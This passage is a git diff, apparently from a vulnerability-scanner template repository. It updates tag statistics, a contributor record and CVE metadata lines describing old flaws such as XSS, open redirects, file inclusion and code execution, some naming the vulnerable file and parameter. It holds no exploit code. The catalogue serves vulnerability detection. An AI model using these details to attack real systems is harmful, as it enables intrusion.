| 1 | | | | | | | | | +| hiberworld | 1 | | | | | | | | | +| independent-academia | 1 | | | | | | | | | +| gravatar | 1 | | | | | | | | | +| hivequeue | 1 | | | | | | | | | +| hihello | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| adWidget | 1 | | | | | | | | | +| allmylinks | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| webctrl | 1 | | | | | | | | | +| ixbusweb | 1 | | | | | | | | | +| chronoforums | 1 | | | | | | | | | +| gorest | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| logger1000 | 1 | | | | | | | | | +| gmail | 1 | | | | | | | | | +| bagisto | 1 | | | | | | | | | +| allesovercrypto | 1 | | | | | | | | | +| audiocode | 1 | | | | | | | | | +| mappress | 1 | | | | | | | | | +| issabel | 1 | | | | | | | | | +| bitcoin | 1 | | | | | | | | | +| debounce | 1 | | | | | | | | | +| tamtam | 1 | | | | | | | | | +| insight | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| curiouscat | 1 | | | | | | | | | +| meshcentral | 1 | | | | | | | | | +| filetransfer | 1 | | | | | | | | | +| pokerstrategy | 1 | | | | | | | | | +| artbreeder | 1 | | | | | | | | | +| v2x | 1 | | | | | | | | | +| mastown-mastodon-instance | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| wp-slimstat | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| t3 | 1 | | | | | | | | | +| incomcms | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| nsq | 1 | | | | | | | | | +| weboftrust | 1 | | | | | | | | | +| orbintelligence | 1 | | | | | | | | | +| mastoai | 1 | | | | | | | | | +| tryhackme | 1 | | | | | | | | | +| zk-framework | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| userstack | 1 | | | | | | | | | +| deeplink | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| qualtrics | 1 | | | | | | | | | +| clickup | 1 | | | | | | | | | +| tablereservation | 1 | | | | | | | | | +| voidtools | 1 | | | | | | | | | +| cookie | 1 | | | | | | | | | +| thinkserver | 1 | | | | | | | | | +| armorgames | 1 | | | | | | | | | +| expressionalsocial-mastodon-instance | 1 | | | | | | | | | +| xbox-gamertag | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| bscw | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| wiren | 1 | | | | | | | | | +| rollupjs | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| micro | 1 | | | | | | | | | +| viddler | 1 | | | | | | | | | +| babypips | 1 | | | | | | | | | +| okidoki | 1 | | | | | | | | | +| faspex | 1 | | | | | | | | | +| pcpartpicker | 1 | | | | | | | | | +| ismygirl | 1 | | | | | | | | | +| binaryedge | 1 | | | | | | | | | +| kipin | 1 | | | | | | | | | +| daily-prayer-time-for-mosques | 1 | | | | | | | | | +| bokbot | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| vklworld-mastodon-instance | 1 | | | | | | | | | +| mailman | 1 | | | | | | | | | +| scraperbox | 1 | | | | | | | | | +| wp-paytm-pay | 1 | | | | | | | | | +| mastodon-mastodon | 1 | | | | | | | | | +| dotnetcms | 1 | | | | | | | | | +| taskrabbit | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| bunpro | 1 | | | | | | | | | +| file-download | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| webshell4 | 1 | | | | | | | | | +| mobiproxy | 1 | | | | | | | | | +| webroot | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| control | 1 | | | | | | | | | +| theguardian | 1 | | | | | | | | | +| narnoo-distributor | 1 | | | | | | | | | +| zzzphp | 1 | | | | | | | | | +| go-ibax | 1 | | | | | | | | | +| eclipsebirt | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| atechmedia | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| buildbot | 1 | | | | | | | | | +| radius | 1 | | | | | | | | | +| scalar | 1 | | | | | | | | | +| crypto | 1 | | | | | | | | | +| prvpl | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| ameblo | 1 | | | | | | | | | +| simple-link-directory | 1 | | | | | | | | | +| martech | 1 | | | | | | | | | +| external-media-without-import | 1 | | | | | | | | | +| vault | 1 | | | | | | | | | +| pa11y | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| wpquery | 1 | | | | | | | | | +| garagemanagementsystem | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| openssl | 1 | | | | | | | | | +| alchemy | 1 | | | | | | | | | +| fanpop | 1 | | | | | | | | | +| elmah | 1 | | | | | | | | | +| colourlovers | 1 | | | | | | | | | +| picsart | 1 | | | | | | | | | +| gargoyle | 1 | | | | | | | | | +| kkFileview | 1 | | | | | | | | | +| rustici | 1 | | | | | | | | | +| hiring | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| wikipedia | 1 | | | | | | | | | +| oxid | 1 | | | | | | | | | +| graphiql | 1 | | | | | | | | | +| bhagavadgita | 1 | | | | | | | | | +| netbiblio | 1 | | | | | | | | | +| coroflot | 1 | | | | | | | | | +| 3dnews | 1 | | | | | | | | | +| rsshub | 1 | | | | | | | | | +| teknik | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| smartgateway | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| fark | 1 | | | | | | | | | +| prexview | 1 | | | | | | | | | +| formalms | 1 | | | | | | | | | +| microservice | 1 | | | | | | | | | +| cnvd2017 | 1 | | | | | | | | | +| supersign | 1 | | | | | | | | | +| badgeos | 1 | | | | | | | | | +| dapr | 1 | | | | | | | | | +| muck-rack | 1 | | | | | | | | | +| obcs | 1 | | | | | | | | | +| dixell | 1 | | | | | | | | | +| pyspider | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| kylin | 1 | | | | | | | | | +| footprints | 1 | | | | | | | | | +| jobs | 1 | | | | | | | | | +| namedprocess | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| jsonbin | 1 | | | | | | | | | +| logitech | 1 | | | | | | | | | +| runcloud | 1 | | | | | | | | | +| wp-gdpr-compliance | 1 | | | | | | | | | +| mqtt | 1 | | | | | | | | | +| 1001mem | 1 | | | | | | | | | +| accuweather | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| gitee | 1 | | | | | | | | | +| vivino | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| franklinfueling | 1 | | | | | | | | | +| seneporno | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| phoronix | 1 | | | | | | | | | +| meteor | 1 | | | | | | | | | +| dwr | 1 | | | | | | | | | +| interactsh | 1 | | | | | | | | | +| simply-schedule-appointments | 1 | | | | | | | | | +| couchcms | 1 | | | | | | | | | +| qvidium | 1 | | | | | | | | | +| homedesign3d | 1 | | | | | | | | | +| satellite | 1 | | | | | | | | | +| weibo | 1 | | | | | | | | | +| clearbit | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| twitch | 1 | | | | | | | | | +| orchard | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| unyson | 1 | | | | | | | | | +| pubsec | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| openhab | 1 | | | | | | | | | +| mastodon-tootcommunity | 1 | | | | | | | | | +| rest | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| slides | 1 | | | | | | | | | +| helloprint | 1 | | | | | | | | | +| fleet | 1 | | | | | | | | | +| trassir | 1 | | | | | | | | | +| mastodon-mstdnio | 1 | | | | | | | | | +| mylot | 1 | | | | | | | | | +| parler | 1 | | | | | | | | | +| ethereum | 1 | | | | | | | | | +| squidex | 1 | | | | | | | | | +| accent | 1 | | | | | | | | | +| elemiz | 1 | | | | | | | | | +| crevado | 1 | | | | | | | | | +| vodafone | 1 | | | | | | | | | +| reblogme | 1 | | | | | | | | | +| paneil | 1 | | | | | | | | | +| cargocollective | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| faust | 1 | | | | | | | | | +| eporner | 1 | | | | | | | | | +| fosstodonorg-mastodon-instance | 1 | | | | | | | | | +| coverity | 1 | | | | | | | | | +| cvent | 1 | | | | | | | | | +| wp-shoutbox-live-chat | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| liberty | 1 | | | | | | | | | +| h5s | 1 | | | | | | | | | +| vertex | 1 | | | | | | | | | +| binom | 1 | | | | | | | | | +| destructoid | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| surreal | 1 | | | | | | | | | +| bibliopac | 1 | | | | | | | | | +| brandfolder | 1 | | | | | | | | | +| stopbadbots | 1 | | | | | | | | | +| kodexplorer | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| nport | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| mastodon-countersocial | 1 | | | | | | | | | +| wix | 1 | | | | | | | | | +| privatekey | 1 | | | | | | | | | +| steam | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| codecademy | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| aspect | 1 | | | | | | | | | +| szmerinfo | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| shortpixel | 1 | | | | | | | | | +| piwik | 1 | | | | | | | | | +| federatedpress-mastodon-instance | 1 | | | | | | | | | +| patriots-win | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| opensearch | 1 | | | | | | | | | +| appian | 1 | | | | | | | | | +| mastodon-climatejusticerocks | 1 | | | | | | | | | +| poshmark | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| ymhome | 1 | | | | | | | | | +| perfsonar | 1 | | | | | | | | | +| registry | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| fatwire | 1 | | | | | | | | | +| media-server | 1 | | | | | | | | | +| pandorafms | 1 | | | | | | | | | +| trino | 1 | | | | | | | | | +| ipfind | 1 | | | | | | | | | +| designspriation | 1 | | | | | | | | | +| vcloud | 1 | | | | | | | | | +| oglaszamy24hpl | 1 | | | | | | | | | +| orcus | 1 | | | | | | | | | +| billquick | 1 | | | | | | | | | +| orbys | 1 | | | | | | | | | +| pulmi | 1 | | | | | | | | | +| sensor | 1 | | | | | | | | | +| promodj | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| osint-image | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| noescape | 1 | | | | | | | | | +| zblog | 1 | | | | | | | | | +| engadget | 1 | | | | | | | | | +| tianqing | 1 | | | | | | | | | +| caa | 1 | | | | | | | | | +| carbonmade | 1 | | | | | | | | | +| ecshop | 1 | | | | | | | | | +| passwordmanager | 1 | | | | | | | | | +| tinder | 1 | | | | | | | | | +| twitter-archived-tweets | 1 | | | | | | | | | +| zendesk | 1 | | | | | | | | | +| bigo-live | 1 | | | | | | | | | +| petfinder | 1 | | | | | | | | | +| monitoring | 1 | | | | | | | | | +| gsm | 1 | | | | | | | | | +| screenshot | 1 | | | | | | | | | +| tufin | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| serpstack | 1 | | | | | | | | | +| pushgateway | 1 | | | | | | | | | +| spx | 1 | | | | | | | | | +| nvrmini | 1 | | | | | | | | | +| icc-pro | 1 | | | | | | | | | +| all-in-one-video-gallery | 1 | | | | | | | | | +| fontsy | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| gira | 1 | | | | | | | | | +| formcraft3 | 1 | | | | | | | | | +| buzzfeed | 1 | | | | | | | | | +| iq-block-country | 1 | | | | | | | | | +| refsheet | 1 | | | | | | | | | +| behat | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| asanhamayesh | 1 | | | | | | | | | +| blogger | 1 | | | | | | | | | +| getresponse | 1 | | | | | | | | | +| proxykingdom | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| pollbot | 1 | | | | | | | | | +| strider | 1 | | | | | | | | | +| ultimate-faqs | 1 | | | | | | | | | +| selfcheck | 1 | | | | | | | | | +| phpbb | 1 | | | | | | | | | +| hashnode | 1 | | | | | | | | | +| qibocms | 1 | | | | | | | | | +| casemanager | 1 | | | | | | | | | +| extralunchmoney | 1 | | | | | | | | | +| ios | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| peing | 1 | | | | | | | | | +| ip2whois | 1 | | | | | | | | | +| creatio | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| simple-urls | 1 | | | | | | | | | +| permissions | 1 | | | | | | | | | +| likeevideo | 1 | | | | | | | | | +| oliver | 1 | | | | | | | | | +| linuxorgru | 1 | | | | | | | | | +| inpost-gallery | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| x-ray | 1 | | | | | | | | | +| houzz | 1 | | | | | | | | | +| piano | 1 | | | | | | | | | +| pfblockerng | 1 | | | | | | | | | +| ffserver | 1 | | | | | | | | | +| enterprise | 1 | | | | | | | | | +| saml | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| webclient | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| faktopedia | 1 | | | | | | | | | +| revealjs | 1 | | | | | | | | | +| gnome-extensions | 1 | | | | | | | | | +| clearfy-cache | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | +| naver | 1 | | | | | | | | | +| meet-me | 1 | | | | | | | | | +| 21buttons | 1 | | | | | | | | | +| cql | 1 | | | | | | | | | +| wireless | 1 | | | | | | | | | +| darudar | 1 | | | | | | | | | +| shirnecms | 1 | | | | | | | | | +| aerocms | 1 | | | | | | | | | +| mofi | 1 | | | | | | | | | +| scratch | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| alquist | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| hoobe | 1 | | | | | | | | | +| hestia | 1 | | | | | | | | | +| calendar | 1 | | | | | | | | | +| cvms | 1 | | | | | | | | | +| my-instants | 1 | | | | | | | | | +| goip | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| umami | 1 | | | | | | | | | +| epp | 1 | | | | | | | | | +| filmweb | 1 | | | | | | | | | +| lvm | 1 | | | | | | | | | +| intel | 1 | | | | | | | | | +| mod-db | 1 | | | | | | | | | +| webp | 1 | | | | | | | | | +| covalent | 1 | | | | | | | | | +| googlemaps | 1 | | | | | | | | | +| backpack | 1 | | | | | | | | | +| tekon | 1 | | | | | | | | | +| dateinasia | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| onlinefarm | 1 | | | | | | | | | +| prototype | 1 | | | | | | | | | +| tabletoptournament | 1 | | | | | | | | | +| omni | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| infinitewp | 1 | | | | | | | | | +| updraftplus | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| imgsrcru | 1 | | | | | | | | | +| aryanic | 1 | | | | | | | | | +| media | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| mailmap | 1 | | | | | | | | | +| diablo | 1 | | | | | | | | | +| zendframework | 1 | | | | | | | | | +| jsapi | 1 | | | | | | | | | +| luci | 1 | | | | | | | | | +| codepen | 1 | | | | | | | | | +| mercurial | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| hcl | 1 | | | | | | | | | +| yazawaj | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| acs | 1 | | | | | | | | | +| facturascripts | 1 | | | | | | | | | +| fhem | 1 | | | | | | | | | +| autonomy | 1 | | | | | | | | | +| cryptobox | 1 | | | | | | | | | +| fuji | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| content-central | 1 | | | | | | | | | +| inkbunny | 1 | | | | | | | | | +| vanguard | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| wowhead | 1 | | | | | | | | | +| duolingo | 1 | | | | | | | | | +| hydra | 1 | | | | | | | | | +| misp | 1 | | | | | | | | | +| locust | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| vercel | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 9d10853699..01d2c94a5b 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1855 | dhiyaneshdk | 835 | http | 5860 | info | 2857 | file | 123 | -| panel | 896 | dwisiswant0 | 794 | workflows | 190 | high | 1270 | dns | 18 | -| wordpress | 781 | daffainfo | 664 | file | 123 | medium | 1042 | | | -| exposure | 677 | pikpikcu | 353 | network | 93 | critical | 704 | | | -| wp-plugin | 672 | pdteam | 278 | dns | 18 | low | 216 | | | -| xss | 646 | pussycat0x | 240 | ssl | 12 | unknown | 26 | | | -| osint | 639 | geeknik | 220 | headless | 9 | | | | | -| tech | 602 | ricardomaia | 215 | TEMPLATES-STATS.json | 1 | | | | | -| edb | 596 | ritikchaddha | 210 | contributors.json | 1 | | | | | -| lfi | 548 | 0x_akoko | 179 | cves.json | 1 | | | | | +| cve | 1882 | dhiyaneshdk | 867 | http | 5927 | info | 2894 | file | 123 | +| panel | 904 | dwisiswant0 | 794 | workflows | 190 | high | 1282 | dns | 18 | +| wordpress | 785 | daffainfo | 664 | file | 123 | medium | 1063 | | | +| exposure | 689 | pikpikcu | 353 | network | 96 | critical | 710 | | | +| wp-plugin | 676 | pdteam | 278 | ssl | 24 | low | 221 | | | +| osint | 652 | pussycat0x | 255 | dns | 18 | unknown | 27 | | | +| xss | 648 | geeknik | 221 | headless | 9 | | | | | +| tech | 612 | ricardomaia | 219 | TEMPLATES-STATS.json | 1 | | | | | +| edb | 597 | ritikchaddha | 215 | cves.json | 1 | | | | | +| lfi | 551 | 0x_akoko | 179 | contributors.json | 1 | | | | | diff --git a/contributors.json b/contributors.json index abd26306fc..d63b99eb8c 100644 --- a/contributors.json +++ b/contributors.json @@ -1378,6 +1378,16 @@ "website": "https://the-empire.systems", "email": "" } + }, + { + "author": "mabdullah22", + "links": { + "github": "https://www.github.com/maabdullah22", + "twitter": "https://twitter.com/0x416264", + "linkedin": "", + "website": "", + "email": "" + } } ] diff --git a/cves.json b/cves.json index 3ff691cf15..c2fb429c44 100644 --- a/cves.json +++ b/cves.json @@ -1,8 +1,11 @@ {"ID":"CVE-2000-0114","Info":{"Name":"Microsoft FrontPage Extensions Check (shtml.dll)","Severity":"low","Description":"Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2000/CVE-2000-0114.yaml"} +{"ID":"CVE-2001-0537","Info":{"Name":"Cisco IOS HTTP Configuration Arbitrary Administrative Access","Severity":"medium","Description":"HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2001/CVE-2001-0537.yaml"} {"ID":"CVE-2002-1131","Info":{"Name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2002/CVE-2002-1131.yaml"} {"ID":"CVE-2004-0519","Info":{"Name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2004/CVE-2004-0519.yaml"} +{"ID":"CVE-2004-1965","Info":{"Name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","Severity":"medium","Description":"Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2004/CVE-2004-1965.yaml"} {"ID":"CVE-2005-2428","Info":{"Name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","Severity":"medium","Description":"Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2005/CVE-2005-2428.yaml"} {"ID":"CVE-2005-3344","Info":{"Name":"Horde Groupware Unauthenticated Admin Access","Severity":"critical","Description":"Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2005/CVE-2005-3344.yaml"} +{"ID":"CVE-2005-3634","Info":{"Name":"SAP Web Application Server 6.x/7.0 - Open Redirect","Severity":"medium","Description":"frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.\n","Classification":{"CVSSScore":"5.0"}},"file_path":"http/cves/2005/CVE-2005-3634.yaml"} {"ID":"CVE-2005-4385","Info":{"Name":"Cofax \u003c=2.0RC3 - Cross-Site Scripting","Severity":"medium","Description":"Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2005/CVE-2005-4385.yaml"} {"ID":"CVE-2006-1681","Info":{"Name":"Cherokee HTTPD \u003c=0.5 - Cross-Site Scripting","Severity":"medium","Description":"Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2006/CVE-2006-1681.yaml"} {"ID":"CVE-2006-2842","Info":{"Name":"Squirrelmail \u003c=1.4.6 - Local File Inclusion","Severity":"high","Description":"SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2006/CVE-2006-2842.yaml"} @@ -12,6 +15,7 @@ {"ID":"CVE-2007-5728","Info":{"Name":"phpPgAdmin \u003c=4.1.1 - Cross-Site Scripting","Severity":"medium","Description":"phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2007/CVE-2007-5728.yaml"} {"ID":"CVE-2008-1059","Info":{"Name":"WordPress Sniplets 1.1.2 - Local File Inclusion","Severity":"high","Description":"PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2008/CVE-2008-1059.yaml"} {"ID":"CVE-2008-1061","Info":{"Name":"WordPress Sniplets \u003c=1.2.2 - Cross-Site Scripting","Severity":"high","Description":"WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2008/CVE-2008-1061.yaml"} +{"ID":"CVE-2008-1547","Info":{"Name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","Severity":"medium","Description":"Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-1547.yaml"} {"ID":"CVE-2008-2398","Info":{"Name":"AppServ Open Project \u003c=2.5.10 - Cross-Site Scripting","Severity":"medium","Description":"AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2008/CVE-2008-2398.yaml"} {"ID":"CVE-2008-2650","Info":{"Name":"CMSimple 3.1 - Local File Inclusion","Severity":"high","Description":"CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-2650.yaml"} {"ID":"CVE-2008-4668","Info":{"Name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","Severity":"high","Description":"Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2008/CVE-2008-4668.yaml"} @@ -23,6 +27,8 @@ {"ID":"CVE-2008-6465","Info":{"Name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","Severity":"medium","Description":"Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2008/CVE-2008-6465.yaml"} {"ID":"CVE-2008-6668","Info":{"Name":"nweb2fax \u003c=0.2.7 - Local File Inclusion","Severity":"high","Description":"nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2008/CVE-2008-6668.yaml"} {"ID":"CVE-2008-6982","Info":{"Name":"Devalcms 1.4a - Cross-Site Scripting","Severity":"high","Description":"Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2008/CVE-2008-6982.yaml"} +{"ID":"CVE-2008-7269","Info":{"Name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2008/CVE-2008-7269.yaml"} +{"ID":"CVE-2009-0347","Info":{"Name":"Autonomy Ultraseek - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2009/CVE-2009-0347.yaml"} {"ID":"CVE-2009-0545","Info":{"Name":"ZeroShell \u003c= 1.0beta11 Remote Code Execution","Severity":"critical","Description":"ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2009/CVE-2009-0545.yaml"} {"ID":"CVE-2009-0932","Info":{"Name":"Horde/Horde Groupware - Local File Inclusion","Severity":"high","Description":"Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2009/CVE-2009-0932.yaml"} {"ID":"CVE-2009-1151","Info":{"Name":"PhpMyAdmin Scripts - Remote Code Execution","Severity":"critical","Description":"PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP 